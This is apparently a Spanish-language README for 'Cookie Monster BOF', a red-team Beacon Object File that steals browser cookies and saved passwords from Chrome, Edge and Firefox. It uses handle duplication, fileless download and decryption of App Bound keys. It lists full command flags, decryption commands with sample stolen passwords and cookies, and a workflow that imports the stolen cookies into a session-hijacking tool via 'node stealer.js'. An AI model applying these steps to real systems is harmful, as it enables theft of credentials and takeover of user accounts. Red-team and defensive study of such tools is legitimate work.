
Herramienta basada en BOF para extraer cookies y credenciales del navegador de Chrome, Edge y Firefox mediante duplicación de identificadores y descarga sin archivos, con soporte de descifrado fuera de línea.
¡Roba cookies de navegadores para Edge, Chrome y Firefox a través de un BOF!
Cookie Monster BOF extraerá la WebKit Master Key y la App Bound Encryption Key tanto para Edge como para Chrome, localizará un proceso del navegador con un manejador de los archivos Cookies y Login Data, copiará el/los manejador(es) y luego descargará sin archivos los archivos objetivo.
Una vez que se descargan los archivos Cookies/Login Data, ¡se puede usar el script de descifrado de Python para extraer esos secretos! El módulo de Firefox analizará profiles.ini y localizará dónde están los archivos logins.json y key4.db y los descargará. Se referencia un repositorio de GitHub separado para el descifrado sin conexión.
Actualizaciones de Chrome y Edge 127+: las nuevas cookies del navegador Chromium (v20) usan la clave vinculada a la aplicación (app bound key) para cifrar las cookies. Como resultado, esto hace que recuperar la app_bound_encrypted_key sea un poco más difícil. Gracias a snovvcrash, este proceso se puede lograr sin tener que escalar privilegios. El inconveniente es que tu proceso debe ejecutarse desde el directorio de aplicación del navegador web, es decir, debe inyectarse en Chrome/Edge o generar un beacon desde el mismo directorio de aplicación que el navegador.
¡Descifra cookies como SYSTEM y sin tener que inyectarte en el proceso del navegador! Agradecimientos a @sdemius por descubrir cómo descifrar la función PostProcessData de Chrome y a @b1scoito por su explicación! Chrome 137+ cambió la función PostProcessData() una vez más, ¡agradecimientos a @runassu por resolverlo!
La última actualización agregó el descifrado de la Webkit Master Key gracias a @M1ndo. La clave maestra se descifra automáticamente junto con la app bound key. Para utilizarla, agregue la clave al script de descifrado de Python. Principalmente, esta clave se usa cuando se usan perfiles roaming, contraseñas almacenadas en Edge o contraseñas antiguas almacenadas.
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"]
cookie-monster Examples:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --system "C:\Users\<USER>\AppData\Local\<BROWSER>\User Data\Local State" <PID>
cookie-moster --firefox
cookie-monster --chromeCookiePID <PID>
cookie-monster --chromeLoginDataPID <PID>
cookie-monster --edgeCookiePID <PID>
cookie-monster --edgeLoginDataPID <PID>
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to cookies and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to cookies and then copies the file to the CWD
--system, Decrypt chromium based browser app bound encryption key without injecting into browser. Requires path to Local State file and PID of a user process for impersonation
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--key-only, only retrieve the app bound encryption key. Do not attempt to download the Cookie or Login Data files.
--cookie-only, only retrieve the Cookie file. Do not attempt to download Login Data file or retrieve app bound encryption key.
--login-data-only, only retrieve the Login Data file. Do not attempt to download Cookie file or retrieve app bound encryption key.
--copy-file, copies the Cookie and Login Data file to the folder specified. Does not use fileless retrieval method.
Asegúrate de tener Mingw-w64 y make instalados en Linux antes de compilar.
make
Instalar requisitos
pip3 install -r requirements.txt
Uso
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
-mk MASTER_KEY, --master-key MASTER_KEY
Old key used in v10 passwords
Ejemplos: Descifrar archivo de cookies de Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Descifrar cookies de Chrome con clave AES de Chrome
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
Descifrar archivo de cookies de Chrome/Edge y guardar como json
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
Importar archivo JSON de cookies con https://cookie-editor.com/
Descifrar archivo de contraseñas de Chrome/Edge
python3 decrypt.py -o passwords -f EdgePasswords.db -k '\xf9\x...' -mk '\xf3\x..'
URL: https://test.com/
Username: adgf
Password: pass
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Descifrar cookies de Firefox y credenciales almacenadas:
https://github.com/lclevy/firepwd
Se agregó la opción cuddlephish al script de descifrado que debería permitir usar la cookie con https://github.com/fkasler/cuddlephish
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
Este proyecto no podría haberse realizado sin la ayuda de Mr-Un1k0d3r y sus increíbles videos de temporada! ¡Recomiendo encarecidamente revisar sus lecciones!!!
Extractor de Webkit Master Key para cookies:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Descarga sin archivos:
https://github.com/fortra/nanodump
Descifrar cookies y datos de inicio de sesión:
https://github.com/login-securite/DonPAPI
Descifrado de App Bound Key:
https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
Descifrar cookies de Chrome 137+
https://github.com/runassu/chrome_v20_decryption